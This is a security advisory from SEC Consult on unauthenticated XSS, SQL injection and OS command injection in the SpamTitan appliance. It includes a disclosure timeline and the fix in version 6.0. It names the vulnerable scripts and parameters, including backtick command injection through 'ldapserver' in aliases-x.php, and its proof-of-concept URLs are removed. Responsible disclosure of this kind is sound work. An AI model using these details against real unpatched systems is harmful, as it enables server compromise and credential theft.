Multiple vulnerabilities in SpamTitan

SEC Consult Vulnerability Lab Security Advisory < 20131015-0 >

=======================================================================

title: Multiple vulnerabilities in SpamTitan

product: SpamTitan

vulnerable version: <=5.12, 5.13 is likely to be affected too

fixed version: 6.00

impact: Critical

homepage: www.spamtitan.com

found: 2013-05-08

by: V. Paulikas

SEC Consult Vulnerability Lab

www.sec-consult.com

=======================================================================

 

Vendor description:

-------------------

"SpamTitan Technologies is a global provider of sophisticated enterprise-level

email security solutions, offering small and medium sized businesses the most

comprehensive protection from email threats, including spam, viruses, Trojans,

phishing, malware and other unwanted content. Our anti spam product was

launched in 2006. Today, we offer different deployment options of SpamTitan:

ISO, VMware and on Demand (cloud based appliance)."

 

www.spamtitan.com

 

 

Business recommendation:

------------------------

All discovered vulnerabilities can be exploited _without_ authentication and

therefore pose a highly critical security risk as the remote command execution

vulnerability can be used for compromising the server. Moreover, SQL injection

allows accessing the database records, such as usernames and hashed passwords

of the management interface.

 

The scope of the test, where the vulnerabilities have been identified, was a

very short evaluation crash-test which the software utterly failed. It is

assumed that further critical vulnerabilities exist within this product!

 

The recommendation of SEC Consult is to immediately switch off

existing SpamTitan systems until further security measures (vendor patch) and

thorough follow-up security tests have been implemented and performed.

 

 

Vulnerability overview/description:

-----------------------------------

1) Cross-Site Scripting

 

The web GUI is prone to the reflected Cross-Site Scripting attacks. The

vulnerability can be used to include HTML or JavaScript code to the affected

web page. The code is executed in the browser of users if they visit the

manipulated site.

 

2) SQL Injection

 

The web GUI is prone to unauthenticated SQL injection. The vulnerability can

be used to access data, such as usernames and MD5 hashed passwords of the web

application users, stored in the database of SpamTitan.

 

3) Remote command execution

 

Due to insufficient input validation, the web GUI fails to properly filter

malicious user input passed from the user side. This leads to unauthenticated

OS command injection with the privileges of the web server. By exploiting this

vulnerability, an attacker can read/write files, open connections, etc. posing

a critical security risk.

 

 

Proof of concept:

-----------------

 

1) The login form of the web GUI is vulnerable to reflected Cross-Site Scripting.

The supplied email address value is reflected without proper validation and

executed in the context of the web browser.

 

[The PoC URL has been removed from this advisory]

 

 

2) The parameter sortkey of the setup-relay-x.php script is vulnerable to a SQL

Injection vulnerability:

 

[The PoC URL has been removed from this advisory]

 

 

3) Due to improper user input validation it is possible to inject arbitrary

operating system commands enclosed in backticks (`). The parameter ldapserver

of the aliases-x.php script is affected by this vulnerability.

 

[The PoC URL has been removed from this advisory]

 

 

Vulnerable / tested versions:

-----------------------------

The vulnerabilities have been verified to exist in the SpamTitan's VMWare

Appliance version 5.12, which was the most recent version at the time of

discovery.

SEC Consult did not test the interim release 5.13, it is assumed that it is

vulnerable too.

 

 

Vendor contact timeline:

------------------------

2013-06-07: Contacted vendor through info@spamtitan.com, no response

2013-06-26: Contacted vendor again through helpdesk@spamtitan.com, no response

2013-07-17: Sending deadline for advisory release to vendor via

info@spamtitan.com, helpdesk@spamtitan.com

2013-07-17: Initial vendor response

2013-07-17: Forwarding security advisory to vendor

2013-07-17: Vendor acknowledges that the advisory was received

2013-07-17: Requesting the date of the patch

2013-07-17: Vendor responds with the end of September as patch release date

2013-09-09: Requesting patch status update

2013-09-11: Vendor reacknowledges end of September as patch release date

2013-09-30: Requesting patch status update

2013-09-30: Vendor responds with a delayed patch release date

2013-10-14: Requesting patch status update

2013-10-14: Vendor acknowledges that security patches and new version of the

product (v6) are available

2013-10-15: SEC Consult releases security advisory

 

 

Solution:

---------

According to the vendor, the new version 6.0 fixes the identified problems. The

new version can be downloaded from their website.

 

 

Workaround:

-----------

None

 

 

Advisory URL:

-------------

www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm

 

 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

 

SEC Consult

Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius

 

Headquarter:

Mooslackengasse 17, 1190 Vienna, Austria

Phone: +43 1 8903043 0

Fax: +43 1 8903043 15

 

Mail: research at sec-consult dot com

Web: www.sec-consult.com

Blog: blog.sec-consult.com

Twitter: twitter.com/sec_consult

 

EOF V. Paulikas / @2013